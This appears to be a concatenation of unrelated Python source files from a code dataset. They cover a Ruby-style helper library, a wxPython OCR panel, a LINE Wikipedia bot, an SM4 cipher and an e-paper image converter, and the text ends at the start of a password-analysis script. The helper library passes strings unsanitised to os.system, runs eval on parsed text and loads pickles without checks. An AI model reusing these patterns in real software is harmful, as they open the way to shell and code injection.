return xlist(os.listdir(mypath))
def length(self):
return len(self)
def say(x):
print(x)
os.system("say '%s'" % x)
def bash(x):
os.system(x)
def beep():
print("\aBEEP ")
def beep(bug=True):
print("\aBEEP ")
import context
if not context.testing:
import os
os.system("say 'beep'")
return 'beeped'
def match_path(p):
if not isinstance(p, str): return False
m = re.search(r'^(/[\w\'.]+)', p)
if not m: return []
return m
def regex_match(a, b):
NONE = "None"
match = regex_matches(a, b)
if match:
try:
return a[match.start():match.end()].strip()
except:
return b[match.start():match.end()].strip()
return NONE
MatchObjectType = type(re.search('', ''))
def typeof(x):
print("type(x)")
return type(x)
def regex_matches(a, b):
if isinstance(a, re._pattern_type):
return a.search(b) #
if isinstance(b, re._pattern_type):
return b.search(a)
if is_string(a) and len(a) > 0:
if a[0] == "/": return re.compile(a).search(b)
if is_string(b) and len(b) > 0:
if b[0] == "/": return re.compile(b).search(a)
try:
b = re.compile(b)
except:
print("FAILED: re.compile(%s)" % b)
b = re.compile(str(b))
print(a)
print(b)
return b.search(str(a)) # vs
def is_file(p, must_exist=True):
if not isinstance(p, str): return False
if re.search(r'^\d*\.\d+', p): return False
if re.match(r'^\d*\.\d+', str(p)): return False
m = re.search(r'^(\/[\w\'\.]+)', p)
m = m or re.search(r'^([\w\/\.]*\.\w+)', p)
if not m: return False
return must_exist and m and os.path.isfile(m.string) or m
def is_dir(x, must_exist=True):
m = match_path(x)
return must_exist and m and (py3 and os.path.isdir(m[0])) or (py2 and os.path.isdirectory(m[0]))
def is_a(self, clazz):
if self is clazz: return True
try:
ok = isinstance(self, clazz)
if ok: return True
except Exception as e:
print(e)
className = str(clazz).lower()
if className == str(self).lower(): return True # KINDA
if self.is_(clazz): return True
return False
if py3:
class file(io.IOBase):
pass # WTF python3 !?!?!?!?!??
class xrange: # WTF python3 !?!?!?!?!??
pass
class xstr(str):
pass # later
class unicode(xstr): # , bytes): # xchar[] TypeError: multiple bases have instance lay-out conflict
# Python 3 renamed the unicode type to str, the old str type has been replaced by bytes.
pass
else: # Python 2 needs:
class bytes(str):
pass
class char(str):
pass
# char = char
class byte(str):
pass
# byte= byte
file = file # nice trick: native py2 class or local py3 class
unicode = unicode
xrange = xrange
if py2:
import cPickle as pickle
else:
import dill as pickle
def type_name(x):
return type(x).__name__
def xx(y):
if type_name(y).startswith('x'): return y
if isinstance(y, xrange): return xlist(y)
if isinstance(y, bool): return y # xbool(y)
if isinstance(y, list): return xlist(y)
if isinstance(y, str): return xstr(y)
if isinstance(y, unicode): return xstr(y)
if isinstance(y, dict): return xdict(y)
if isinstance(y, float): return xfloat(y)
if isinstance(y, int): return xint(y)
if isinstance(y, file): return xfile(y)
if isinstance(y, char): return xchar(y)
if isinstance(y, byte): return xchar(y)
if py3 and isinstance(y, range): return xlist(y)
print("No extension for type %s" % type(y))
return y
extensionMap = {}
def extension(clazz):
try:
for base in clazz.__bases__:
extensionMap[base] = clazz
except:
pass
return clazz
class Class:
pass
@extension
class xfile(file):
path = ""
def name(self):
return self.path
def filename(self):
return self.path
def mv(self, to):
os.rename(self.path, to)
def move(self, to):
os.rename(self.path, to)
def copy(self, to):
shutil.copyfile(self.path, to)
def cp(self, to):
shutil.copyfile(self.path, to)
def contain(self, x):
return self.path.index(x)
def contains(self, x):
return self.path.index(x)
@staticmethod
def delete():
raise Exception("SecurityError: cannot delete files")
@staticmethod
def open(x): return open(x)
@staticmethod
def read(x): return open(x)
@staticmethod
def ls(mypath="."):
return xlist(os.listdir(mypath))
@extension
class File(xfile):
pass
@extension
class Directory(file):
@classmethod
def cd(path):
os.chdir(path)
def files(self):
os.listdir(str(self)) # ?
@classmethod
def ls(path="."):
os.listdir(path)
@classmethod
def files(path):
os.listdir(path)
def contains(self, x):
return self.files().has(x)
class Dir(Directory):
pass
class xdir(Directory):
pass
@extension
class xdict(dict):
def clone(self):
import copy
return copy.copy(self)
def contains(self, key):
return self.keys().contains(key)
class Class:
def wrap(self):
return str(self) # TODO!?
from functools import partial
@extension
class xlist(list):
def unique(xs):
return xlist(set(xs))
def uniq(xs):
return xlist(set(xs))
def unique(xs):
return xlist(set(xs))
def add(self, x):
self.insert(len(self), x)
def method_missing(xs, name, *args, **kwargs): # [2.1,4.8].int=[2,5]
if len(xs) == 0: return None
try:
method = getattr(xs.first(), name)
except:
# if str(name) in globals():
method = globals()[str(name)] # .method(m)
if not callable(method):
properties = xlist(map(lambda x: getattr(x, name), xs))
return xlist(zip(xs, properties))
# return properties
return xlist(map(lambda x: method(args, kwargs), xs)) # method bound to x
def pick(xs):
return xs[randint(len(xs))]
def __getattr__(self, name):
if str(name) in globals():
method = globals()[str(name)] # .method(m)
try:
return method(self)
except:
xlist(map(method, self))
return self.method_missing(name)
# return partial(self.method_missing, name)
def select(xs, func): # VS MAP!!
# return [x for x in xs if func(x)]
return filter(func, xs)
def map(xs, func):
return xlist(map(func, xs))
def last(xs):
return xs[-1]
def first(xs):
return xs[0]
def fold(self, x, fun):
if not callable(fun):
fun, x = x, fun
return self.reduce(fun, self, x)
def row(xs, n):
return xs[int(n) - 1]
def column(xs, n):
if isinstance(xs[0], str):
return xlist(map(lambda row: xstr(row).word(n + 1), xs))
if isinstance(xs[0], list):
return xlist(map(lambda row: row[n], xs))
raise Exception("column of %s undefined" % type(xs[0]))
# c=self[n]
def length(self):
return len(self)
def clone(self):
import copy
return copy.copy(self)
# return copy.deepcopy(self)
def flatten(self):
from itertools import chain
return list(chain.from_iterable(self))
def __gt__(self, other):
if not isinstance(other, list): other = [other]
return list.__gt__(self, other)
def __lt__(self, other):
if not isinstance(other, list): other = [other]
return list.__lt__(self, other)
# TypeError: unorderable types: int() < list() fucking python 3
# def __cmp__(self, other):
# if not isinstance(other, list): other = [other]
# return list.__cmp__(self, other)
def __sub__(self, other): # xlist-[1]-[2] minus
if not hasattr(other, '__iter__'): other = [other]
return xlist(i for i in self if i not in other)
def __rsub__(self, other): # [1]-xlist-[2] ok!
return xlist(i for i in other if i not in self)
def c(self):
return xlist(map(str.c, self).join(", ")) # leave [] which is not compatible with C
def wrap(self):
# map(wrap).join(", ") # leave [] which is not compatible with C
return "rb_ary_new3(#{size}/*size*', #{wraps})" # values
def wraps(self):
return xlist(map(lambda x: x.wrap, self).join(", ")) # leave [] which is not compatible with C
def values(self):
return xlist(map(lambda x: x.value, self).join(", ")) # leave [] which is not compatible with C
def contains_a(self, type):
for a in self:
if isinstance(a, type): return True
return False
def drop(self, x):
return self.reject(x)
def to_s(self):
return self.join(", ")
# ifdef $auto_map:
# def method_missing(method, *args, block):
# if args.count==0: return self.map (lambda x: x.send(method ))
# if args.count>0: return self.map (lambda x: x.send(method, args) )
# super method, *args, block
# def matches(item):
# contains item
#
# remove: confusing!!
def matches(self, regex):
for i in self.flatten():
m = regex.match(i.gsub(r'([^\w])', "\\\\\\1")) # escape_token(i))
if m:
return m
return False
def And(self, x):
if not isinstance(x, list): self + [x]
return self + x
def plus(self, x):
if not isinstance(x, list): self + [x]
return self + x
# EVIL!!
# not def(self):
# None? not or
# def = x unexpected '=':
# is x
#
# def grep(x):
# select{|y|y.to_s.match(x)}
#
def names(self):
return xlist(map(str, self))
def rest(self, index=1):
return self[index:]
def fix_int(self, i):
if str(i) == "middle": i = self.count() / 2
if isinstance(i, Numeric): return i - 1
i = xstr(i).parse_integer()
return i - 1
def character(self, nr):
return self.item(nr)
def item(self, nr): # -1 AppleScript style !!! BUT list[0] !!!
return self[xlist(self).fix_int(nr)]
def word(self, nr): # -1 AppleScript style !!! BUT list[0] !!!):
return self[xlist(self).fix_int(nr)]
def invert(self): # ! Self modifying !
self.reverse()
return self
def get(self, x):
return self[self.index(x)]
# def row(self, n):
# return self.at(n)
def has(self, x):
return self.index(x)
def contains(self, x):
ok = self.index(x)
if ok:
return self.at(self.index(x))
else:
return False
# def to_s:
# "["+join(", ")+"]"
#
# class TrueClass:
# not def(self):
# False
class FalseClass:
# not def(self):
# True
def wrap(self):
return self
def c(self):
return self
@extension
class xstr(str):
# @staticmethod
# def invert(self):
# r=reversed(self) #iterator!
# return "".join(r)
def invert(self):
r = reversed(self) # iterator!
self = "".join(r)
return self
def inverse(self):
r = reversed(self) # iterator!
return "".join(r)
def reverse(self):
r = reversed(self) # iterator!
return "".join(r)
def to_i(self):
return int(self)
# to_i=property(to_i1,to_i1)
def quoted(self):
return "%s" % self
# def c(self):
# return self.quoted()
# def id(self):
# return "id(%s)" % self
#
# def wrap(self):
# return "s(%s)" % self
# def value(self):
# return self # variable
# quoted
# def name(self):
# return self
def number(self):
return int(self)
def is_in(self, ary):
return ary.has(self)
def cut_to(self, pattern):
return self.sub(0, self.indexOf(pattern))
def matches(self, regex):
if isinstance(regex, list):
for x in regex:
if re.match(x):
return x
else:
return re.match(regex)
return False
def strip_newline(self):
return self.strip() # .sub(r';$', '')
def join(self, x):
return self + x
# def < x:
# i=x.is_a?Numeric
# if i:
# return int(self)<x
#
# super.< x
#
def starts_with(self, x):
# puts "WARNING: start_with? missspelled as starts_with?"
if isinstance(x, list):
for y in x:
if self.startswith(y): return y
return self.startswith(x)
# def show(self, x=None):
# print(x or self)
# return x or self
def contains(self, *things):
for t in flatten(things):
if self.index(t): return True
return False
def fix_int(self, i):
if str(i) == "middle": i = self.count / 2
if isinstance(i, int): return i - 1
i = xstr(i).parse_integer()
return i - 1
def sentence(self, i):
i = self.fix_int(i)
return self.split(r'[\.\?\!\;]')[i]
def paragraph(self, i):
i = self.fix_int(i)
return self.split("\n")[i]
def word(self, i):
i = self.fix_int(i)
replaced = self.replace("\t", " ").replace(" ", " ").replace("\t", " ").replace(" ", " ") # WTF
words = replaced.split(" ")
if i >= len(words): return self # be gentle
return words[i]
def item(self, i):
return self.word(i)
def char(self, i):
return self.character(i)
def character(self, i):
i = self.fix_int(i)
return self[i - 1:i]
def flip(self):
return self.split(" ").reverse.join(" ")
def plus(self, x):
return self + x
def _and(self, x):
return self + x
def add(self, x):
return self + x
def offset(self, x):
return self.index(x)
def __sub__(self, x):
return self.gsub(x, "")
# self[0:self.index(x)-1]+self[self.index(x)+x.length:-1]
def synsets(self, param):
pass
def is_noun(self): # expensive!!!):
# Sequel::InvalidOperation Invalid argument used for IS operator
return self.synsets('noun') or self.gsub(r's$', "").synsets('noun') # except False
def is_verb(self):
return self.synsets('verb') or self.gsub(r's$', "").synsets('verb')
def is_a(className):
className = className.lower()
if className == "quote": return True
return className == "string"
def is_adverb(self):
return self.synsets('adverb')
def is_adjective(self):
return self.synsets('adjective')
def examples(self):
return xlist(self.synsets.flatten.map('hyponyms').flatten().map('words').flatten.uniq.map('to_s'))
# def not_(self):
# return None or not
def lowercase(self):
return self.lower()
# def replace(self,param, param1):
# pass
def replaceAll(self, pattern, string):
return re.sub(pattern, string, self)
def shift(self, n=1):
n.times(self=self.replaceAll(r'^.', ""))
# self[n:-1]
def replace_numerals(self):
x = self
x = x.replace(r'([a-z])-([a-z])', "\\1+\\2") # WHOOOT???
x = x.replace("last", "-1") # index trick
# x = x.replace("last", "0") # index trick
x = x.replace("first", "1") # index trick
x = x.replace("tenth", "10")
x = x.replace("ninth", "9")
x = x.replace("eighth", "8")
x = x.replace("seventh", "7")
x = x.replace("sixth", "6")
x = x.replace("fifth", "5")
x = x.replace("fourth", "4")
x = x.replace("third", "3")
x = x.replace("second", "2")
x = x.replace("first", "1")
x = x.replace("zero", "0")
x = x.replace("4th", "4")
x = x.replace("3rd", "3")
x = x.replace("2nd", "2")
x = x.replace("1st", "1")
x = x.replace("(\d+)th", "\\1")
x = x.replace("(\d+)rd", "\\1")
x = x.replace("(\d+)nd", "\\1")
x = x.replace("(\d+)st", "\\1")
x = x.replace("a couple of", "2")
x = x.replace("a dozen", "12")
x = x.replace("ten", "10")
x = x.replace("twenty", "20")
x = x.replace("thirty", "30")
x = x.replace("forty", "40")
x = x.replace("fifty", "50")
x = x.replace("sixty", "60")
x = x.replace("seventy", "70")
x = x.replace("eighty", "80")
x = x.replace("ninety", "90")
x = x.replace("ten", "10")
x = x.replace("eleven", "11")
x = x.replace("twelve", "12")
x = x.replace("thirteen", "13")
x = x.replace("fourteen", "14")
x = x.replace("fifteen", "15")
x = x.replace("sixteen", "16")
x = x.replace("seventeen", "17")
x = x.replace("eighteen", "18")
x = x.replace("nineteen", "19")
x = x.replace("ten", "10")
x = x.replace("nine", "9")
x = x.replace("eight", "8")
x = x.replace("seven", "7")
x = x.replace("six", "6")
x = x.replace("five", "5")
x = x.replace("four", "4")
x = x.replace("three", "3")
x = x.replace("two", "2")
x = x.replace("one", "1")
x = x.replace("dozen", "12")
x = x.replace("couple", "2")
# x = x.replace("½", "+.5");
x = x.replace("½", "+1/2.0");
x = x.replace("⅓", "+1/3.0");
x = x.replace("⅔", "+2/3.0");
x = x.replace("¼", "+.25");
x = x.replace("¼", "+1/4.0");
x = x.replace("¾", "+3/4.0");
x = x.replace("⅕", "+1/5.0");
x = x.replace("⅖", "+2/5.0");
x = x.replace("⅗", "+3/5.0");
x = x.replace("⅘", "+4/5.0");
x = x.replace("⅙", "+1/6.0");
x = x.replace("⅚", "+5/6.0");
x = x.replace("⅛", "+1/8.0");
x = x.replace("⅜", "+3/8.0");
x = x.replace("⅝", "+5/8.0");
x = x.replace("⅞", "+7/8.0");
x = x.replace(" hundred thousand", " 100000")
x = x.replace(" hundred", " 100")
x = x.replace(" thousand", " 1000")
x = x.replace(" million", " 1000000")
x = x.replace(" billion", " 1000000000")
x = x.replace("hundred thousand", "*100000")
x = x.replace("hundred ", "*100")
x = x.replace("thousand ", "*1000")
x = x.replace("million ", "*1000000")
x = x.replace("billion ", "*1000000000")
return x
def parse_integer(self):
n = self.replace_numerals()
i = int(n) # except 666
# i = int(eval(str(self))) # except 666
return i
def parse_number(self):
x = self.replace_numerals()
try:
x = float(x)
except:
x = eval(x) # !! danger!
if x == 0: return "0" # ZERO
return x
# def __sub__(self, other): # []= MISSING in python!!
# x="abc"
# >>> x[2]='a'
# TypeError: 'str' object does not support item assignment WTF
def reverse(self):
# return self[slice(start=None,stop=None,step=-1)]
return self[::-1] # very pythonic, It works by doing [begin:end:step]
# a slower approach is ''.join(reversed(s))
@staticmethod
def reverse_string(str):
return xstr(str).reverse()
class xchar(unicode): # unicode: multiple bases have instance lay-out conflict
def __coerce__(self, other):
if isinstance(other, int):
other = chr(other)
# if isinstance(other,str):
# other=chr(other)
return type(other)(self), other
# class Fixnum Float
# class Numeric:
# @Extension(int)
@extension
class xint(int):
# operator.truth(obj)
# Return True if obj is true, and False otherwise. This is equivalent to using the bool constructor.
# operator.is_(a, b)
# Return a is b. Tests object identity.
# operator.is_not(a, b)
# Return a is not b. Tests object identity.
def __coerce__(self, other):
return int(other)
# def __cmp__(self, other):
# if isinstance(other, list): return list.__cmp__([self], other)
def c(self): # unwrap, for optimization):
return str(self) # "NUM2INT(#{self.to_s})"
def value(self):
return self
def wrap(self):
return "INT2NUM(#{self.to_s})"
def number(self):
return self
def _and(self, x):
return self + x
def plus(self, x):
return self + x
def minus(self, x):
return self - x
def times(self, x):
if callable(x):
return [x() for i in xrange(self)]
else:
return self * x
def times_do(self, fun):
x = None
for i in range(0, self):
x = fun()
return x
def less(self, x):
if isinstance(x, str): return self < int(x)
return super.__lt__(x)
def is_blank(self):
return False
def is_a(self, clazz):
className = str(clazz).lower()
if className == "number": return True
if className == "real": return True
if className == "float": return True
# int = ALL : Fixnum = small int AND :. Bignum = big : 2 ** (1.size * 8 - 2)
if isinstance(self, int) and className == "integer": return True # todo move
if isinstance(self, int) and className == "int": return True
if className == str(self).lower(): return True # KINDA
if self.isa(clazz): return True
return False
def add(self, x):
return self + x
def increase(self, by=1):
return self + by # Can't change the value of numeric self!!
def decrease(self, by=1):
return self - by # Can't change the value of numeric self!!
def bigger(self, x):
return self > x
def smaller(self, x):
return self < x
def to_the_power_of(self, x):
return self**x
def to_the(self, x):
return self**x
def logarithm(self):
return math.log(self)
def e(self):
return math.exp(self)
def exponential(self):
return math.exp(self)
def sine(self):
return math.sin(self)
def cosine(self):
return math.cos(self)
def root(self):
return math.sqrt(self)
def power(self, x):
return self**x
def square(self):
return self * self
# todo: use ^^
def squared(self):
return self * self
class Numeric(xint):
pass
class Integer(xint):
@classmethod
def __eq__(self, other):
if other == int: return True
if other == xint: return True
if other == Integer: return True
return False
@extension
class xfloat(float):
def to_i(self):
return int(self)
def c(self): # unwrap, for optimization):
return str(self) # "NUM2INT(#{self.to_s})"
def value(self):
return self
def number(self):
return self
def _and(self, x):
return self + x
def add(self, x):
return self + x
def plus(self, x):
return self + x
def minus(self, x):
return self - x
def times(self, x):
return self * x
def less(self, x):
if isinstance(x, str): return self < int(x)
return super.__lt__(x)
def is_blank(self):
return False
def is_a(self, clazz):
className = str(clazz).lower()
if className == "number": return True
if className == "real": return True
if className == "float": return True
# int = ALL : Fixnum = small int AND :. Bignum = big : 2 ** (1.size * 8 - 2)
if isinstance(self, int) and className == "integer": return True # todo move
if isinstance(self, int) and className == "int": return True
if className == str(self).lower(): return True # KINDA
if self.isa(clazz): return True
return False
def increase(self, by=1):
return self + by # Can't change the value of numeric self!!
def decrease(self, by=1):
return self - by # Can't change the value of numeric self!!
def bigger(self, x):
return self > x
def smaller(self, x):
return self < x
def is_bigger(self, x):
return self > x
def is_smaller(self, x):
return self < x
def to_the_power_of(self, x):
return self**x
def to_the(self, x):
return self**x
def logarithm(self):
return math.log(self)
def e(self):
return math.exp(self)
def exponential(self):
return math.exp(self)
def sine(self):
return math.sin(self)
def cosine(self):
return math.cos(self)
def root(self):
return math.sqrt(self)
def power(self, x):
return self**x
def square(self):
return self * self
# todo: use ^^
def squared(self):
return self * self
# if self==false: return True
# if self==True: return false
# class Enumerator
@extension # DANGER?
class xobject:
def __init__(selfy):
selfy.self = selfy
def value(self):
return self
def number(self):
return False
# not def(self):
# return False
def throw(self, x):
raise x
def type(self):
return self.__class__
def kind(self):
return self.__class__
def log(*x):
print(x)
def debug(*x):
print(x)
def is_a(self, clazz):
if self is clazz: return True
try:
ok = isinstance(self, clazz)
if ok: return True
except Exception as e:
print(e)
className = str(clazz).lower()
if className == str(self).lower(): return True # KINDA
if self.is_(clazz): return True
return False
def is_(self, x):
if not x and not self: return True
if x == self: return True
if x is self: return True
if str(x).lower() == str(self).lower(): return True # KINDA
if isinstance(self, list) and self.length == 1 and x.is_(self[0]): return True
if isinstance(x, list) and x.length == 1 and self.is_(x[0]): return True
return False
def load(file):
return open(file, 'rt').read()
def load_binary(file):
return open(file, 'rb').read()
def read(file):
return open(file, 'rt').read()
def readlines(file):
return open(file, 'rt').readlines()
def read_binary(file):
return open(file, 'rb').read()
def dump(o, file="dump.bin"):
pickle.dump(o, open(file, 'wb'), protocol=pickle.HIGHEST_PROTOCOL)
print("saved to '" + file + "'")
save = dump
write = dump
def write_direct(data, file):
open(file, 'wb').write(data)
def load_pickle(file_name="dump.bin"):
return pickle.load(open(file_name, 'rb'))
def unpickle(file_name="dump.bin"):
return pickle.load(open(file_name, 'rb'))
def undump(file_name="dump.bin"):
return pickle.load(open(file_name, 'rb'))
def restore(file_name="dump.bin"):
return pickle.load(open(file_name, 'rb'))
def run(cmd):
os.system(cmd)
def exists(file):
os.path.exists(file)
def find_in_module(module, match="", recursive=True):
if isinstance(module, str):
module = sys.modules[module]
for name, obj in inspect.getmembers(module):
# if inspect.isclass(obj):
if match in name:
print(obj)
if inspect.ismodule(obj) and recursive and obj != module:
if module.__name__ in obj.__name__:
find_in_module(obj, match)
def find_class(match=""):
import sys, inspect
for module in sys.modules.keys():
for name, obj in inspect.getmembers(sys.modules[module]):
if inspect.isclass(obj):
if match in str(obj):
print(obj)
print("[Extensions]: Cargado")
```
#### File: src/char_recognition/treePanel.py
```python
import wx
import numpy
import read_files as data
from PIL import Image
import letter
class MyTree(wx.TreeCtrl):
def __init__(self, parent, id, pos, size, style):
wx.TreeCtrl.__init__(self, parent, id, pos, size, style)
class TreePanel(wx.Panel):
def __init__(self, parent, panel, net):
wx.Panel.__init__(self, parent)
self.panel = panel
self.net = net
self.tree = MyTree(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TR_HAS_BUTTONS)
self.carpetas = []
self.nombres = []
self.ficheros = []
self.nombresFiles = []
self.Bind(wx.EVT_TREE_SEL_CHANGING, self.OnClick, self.tree)
self.root = self.tree.AddRoot('Images')
self.tree.Expand(self.root)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.tree, 1, wx.EXPAND)
self.SetSizer(sizer)
def OnClick(self, e):
try:
index = self.ficheros.index(e.GetItem())
self.panel.etiqueta.SetLabel(self.nombresFiles[index])
self.panel.ruta.SetLabel(data.files[index].dir)
l1, l2, l3, e1, e2, e3 = self.predict(data.files[index].dir)
self.panel.generada1.SetLabel(l1)
self.panel.generada2.SetLabel(l2)
self.panel.generada3.SetLabel(l3)
self.panel.error1.SetLabel(str(e1))
self.panel.error2.SetLabel(str(e2))
self.panel.error3.SetLabel(str(e3))
except ValueError:
value = False
def nuevaCarpeta(self, nombre):
self.carpetas.append(self.tree.AppendItem(self.root, nombre))
self.nombres.append(nombre)
def nuevoFichero(self, carpeta, fichero):
index = self.nombres.index(carpeta)
self.ficheros.append(self.tree.AppendItem(self.carpetas[index], fichero))
self.nombresFiles.append(fichero)
def predict(self, direction):
size = 24 # 24 pycharm font
image = Image.open(direction)
#print(image)
array = numpy.array(image.getdata()) # (1, 4000, 4)
mat = array.reshape(image.height, image.width, 4)[:, :, 0]
if size> image.height:
mat=numpy.pad(mat, (0, size- image.height), 'constant', constant_values=255) # 1==white!
mat = 1 - 2 * mat / 255.
try:
result = self.net.predict(mat)
estimada = numpy.argmax(result)
list_sort = numpy.argsort(result)
size=len(list_sort[0][0])
best=estimada+letter.offset
best1 = result[0][0][size-1]+letter.offset
best2 = result[0][0][size-2]+letter.offset
best3 = result[0][0][size-3]+letter.offset
letra1 = chr(list_sort[0][0][size-1]+letter.offset)
letra2 = chr(list_sort[0][0][size-2]+letter.offset)
letra3 = chr(list_sort[0][0][size-3]+letter.offset)
error1 = result[0][0][size-1]
error2 = result[0][0][size-2]
error3 = result[0][0][size-3]
return [letra1, letra2, letra3, error1, error2, error3]
except Exception as ex:
print("EX: %s"%ex)
``` |
{
"source": "0x0u/wikipedia_linebot",
"score": 3
} |
#### File: wikipedia_linebot/src/database.py
```python
from typing import Dict
from sqlalchemy import desc
from flask_sqlalchemy import BaseQuery
from src import db
from src.models import Users, Histories
def get_user(user_id: str) -> Users:
"""
DBからLINEのユーザーIDに基づくユーザー情報を取得する
Args:
user_id(str): LINEのユーザーID
Returns:
User: ユーザー情報
"""
user = db.session.query(Users).filter_by(user_id=user_id).first()
if not user:
user = Users()
user.user_id = user_id
db.session.add(user)
db.session.commit()
return user
def update_user(user_id: str, **kwargs: Dict) -> None:
"""
ユーザー情報の更新
Args:
user_id(str): LINEのユーザーID
kwargs: langかshow_urlをとる
"""
user = db.session.query(Users).filter_by(user_id=user_id).first()
if kwargs.get('lang'):
user.lang = kwargs['lang']
if kwargs.get('show_url') is not None:
user.show_url = kwargs['show_url']
db.session.add(user)
db.session.commit()
def add_history(user_id: str, word: str) -> None:
"""
履歴の追加
Args:
user_id(str): LINEのユーザーID
word(str): 検索結果のタイトル
"""
history = Histories()
history.user_id = user_id
history.history = word
db.session.add(history)
db.session.commit()
def get_history(user_id: str) -> BaseQuery:
"""
DBからLINEのユーザーIDに基づく検索履歴を最大13件取得する
Args:
user_id(str): LINEのユーザーID
Returns:
BaseQuery: 履歴
"""
return db.session.query(Histories).filter_by(user_id=user_id).order_by(desc(Histories.created_at)).limit(13)
```
#### File: wikipedia_linebot/src/views.py
```python
from flask import request, abort
from linebot.exceptions import (InvalidSignatureError)
from linebot.models import (MessageEvent, TextMessage)
from src import app, handler, line
from src.message import create_reply_content
@app.route('/', methods=['GET'])
def route():
return 'ok'
@app.route('/callback', methods=['POST'])
def callback():
signature = request.headers['X-Line-Signature']
body = request.get_data(as_text=True)
app.logger.info('Request body: ' + body)
try:
handler.handle(body, signature)
except InvalidSignatureError:
abort(400)
return 'OK'
@handler.add(MessageEvent, message=TextMessage)
def handle_message(event):
message = event.message.text
user_id = event.source.user_id
user_name = line.get_profile(user_id).display_name
print(f'Received message: \'{message}\' from {user_name}')
reply_content = create_reply_content(message, user_id)
line.reply_message(event.reply_token, reply_content)
``` |
{
"source": "0x10001/sm4",
"score": 3
} |
#### File: sm4/sm4/base.py
```python
import struct
from .compatibility import iter_range
from .core import derive_keys, encode_block
class SM4Key(object):
"""A class for encryption using SM4 Key"""
def __init__(self, key):
self.__encryption_key = guard_key(key)
self.__decryption_key = self.__encryption_key[::-1]
self.__key = key
def encrypt(self, message, initial=None, padding=False):
"""Encrypts the message with the key object.
:param message: {bytes} The message to be encrypted
:param initial: {union[bytes, NoneType]} The initial value, using CBC Mode when is not None
:param padding: {any} Uses PKCS5 Padding when TRUTHY
:return: {bytes} Encrypted bytes
"""
return handle(message, self.__encryption_key, initial, padding, 1)
def decrypt(self, message, initial=None, padding=False):
"""Decrypts the encrypted message with the key object.
:param message: {bytes} The message to be decrypted
:param initial: {union[bytes, NoneType]} The initial value, using CBC Mode when is not None
:param padding: {any} Uses PKCS5 Padding when TRUTHY
:return: {bytes} Decrypted bytes
"""
return handle(message, self.__decryption_key, initial, padding, 0)
def __hash__(self):
return hash((self.__class__, self.__encryption_key))
def guard_key(key):
if isinstance(key, bytearray):
key = bytes(key)
assert isinstance(key, bytes), "The key should be `bytes` or `bytearray`"
assert len(key) == 16, "The key should be of length 16"
return tuple(derive_keys(key))
def guard_message(message, padding, encryption):
assert isinstance(message, bytes), "The message should be bytes"
length = len(message)
if encryption and padding:
return message.ljust(length + 16 >> 4 << 4, chr(16 - (length & 15)).encode())
assert length & 15 == 0, (
"The length of the message should be divisible by 16"
"(or set `padding` to `True` in encryption mode)"
)
return message
def guard_initial(initial):
if initial is None:
return
if isinstance(initial, bytearray):
initial = bytes(initial)
assert isinstance(initial, bytes), "The initial value should be of type `bytes` or `bytearray`"
assert len(initial) & 15 == 0, "The initial value should be of length 16"
return struct.unpack(">IIII", initial)
def handle(message, key, initial, padding, encryption):
message = guard_message(message, padding, encryption)
initial = guard_initial(initial)
blocks = (struct.unpack(">IIII", message[i: i + 16]) for i in iter_range(0, len(message), 16))
if initial is None:
# ECB
encoded_blocks = ecb(blocks, key)
else:
# CBC
encoded_blocks = cbc(blocks, key, initial, encryption)
ret = b"".join(struct.pack(">IIII", *block) for block in encoded_blocks)
return ret[:-ord(ret[-1:])] if not encryption and padding else ret
def ecb(blocks, key):
for block in blocks:
yield encode_block(block, key)
def cbc(blocks, key, initial, encryption):
if encryption:
for block in blocks:
data = tuple(x ^ y for x, y in zip(block, initial))
initial = encode_block(data, key)
yield initial
else:
for block in blocks:
data = encode_block(block, key)
initial, block = block, tuple(x ^ y for x, y in zip(data, initial))
yield block
``` |
{
"source": "0x1001/picture-box",
"score": 3
} |
#### File: picture-box/image_converter/convert.py
```python
import argparse
from PIL import Image
import os
WIDTH = 400
HEIGHT = 300
def convert_dir(path):
for root, dirs, files in os.walk(path):
for file_name in files:
if file_name.lower().endswith(".png") or file_name.lower().endswith(".jpg") or file_name.lower().endswith(".jpeg"):
convert(os.path.join(root, file_name))
def convert(path):
print("Processing: " + path)
im = Image.open(path)
im = _resize(im)
im = im.convert('1')
pixels = im.load()
im.save(os.path.join(os.path.dirname(path), "_" + os.path.splitext(os.path.basename(path))[0] + os.path.splitext(os.path.basename(path))[1]))
binary_image = bytearray(int(WIDTH*HEIGHT/8))
for i in range(WIDTH):
for j in range(HEIGHT):
if pixels[i, j] == 255:
binary_image[int((i + j * WIDTH) / 8)] |= 0x80 >> (i % 8)
#image[(x + y * this->width) / 8] |= 0x80 >> (x % 8);
else:
binary_image[int((i + j * WIDTH) / 8)] &= ~(0x80 >> (i % 8))
#image[(x + y * this->width) / 8] &= ~(0x80 >> (x % 8));
with open(os.path.splitext(path)[0] + ".bin", "wb") as fp:
fp.write(binary_image)
def _resize(im):
width, height = im.size
if 1.3 < width/height < 1.4:
raise Exception("Width or height of the picture is not supported: {0}x{1}".format(width, height))
return im.resize((400,300))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Converts any 4:3 image to Waveshare 4.2inc screen SRAM format.')
parser.add_argument('--path', "-p",
required=True,
type=str,
dest="path",
help='path to image file or to folder with images')
args = parser.parse_args()
if os.path.isfile(args.path):
convert(args.path)
elif os.path.isdir(args.path):
convert_dir(args.path)
``` |
{
"source": "0x10F8/Isker",
"score": 2
} |
#### File: Isker/api/api.py
```python
import requests
DATASOURCE = 'tranquility'
BASE_URL = 'https://esi.evetech.net'
RETRIES = 10
def build_url(version, path):
return BASE_URL + '/' + 'v' + str(version) + '/' + path
def do_get(version, path, params):
return do_get_retry(version, path, params, RETRIES)
def do_get_retry(version, path, params, retries_remaining):
if retries_remaining > 0:
url = build_url(version, path)
params['datasource'] = DATASOURCE
try:
response = requests.get(url=url, params=params).json()
except:
response = do_get_retry(version, path, params, (retries_remaining - 1))
return response
``` |
{
"source": "0x10F8/PasswordAnalyser",
"score": 3
} |
#### File: 0x10F8/PasswordAnalyser/analyse.py
```python
from sys import argv
from palogging import palog
from panalyser import analysistools
from pafiletools import filetools
from paprogressbar import progressbar
from json import dumps
from concurrent.futures import ThreadPoolExecutor
import sys
# Check arguments
if len(argv) < 3:
palog.log("usage: {0} <input_list> <output_file>".format(argv[0]))
exit(1)
# Gather the input and output file
INPUT_PASSWORD_LIST = argv[1]
OUTPUT_FILE = argv[2]
# Create a list of the analysis methods we will use
analysis_methods = [analysistools.get_zxcvbn_analysis,
analysistools.get_hibp_analysis,
analysistools.get_character_types_used]
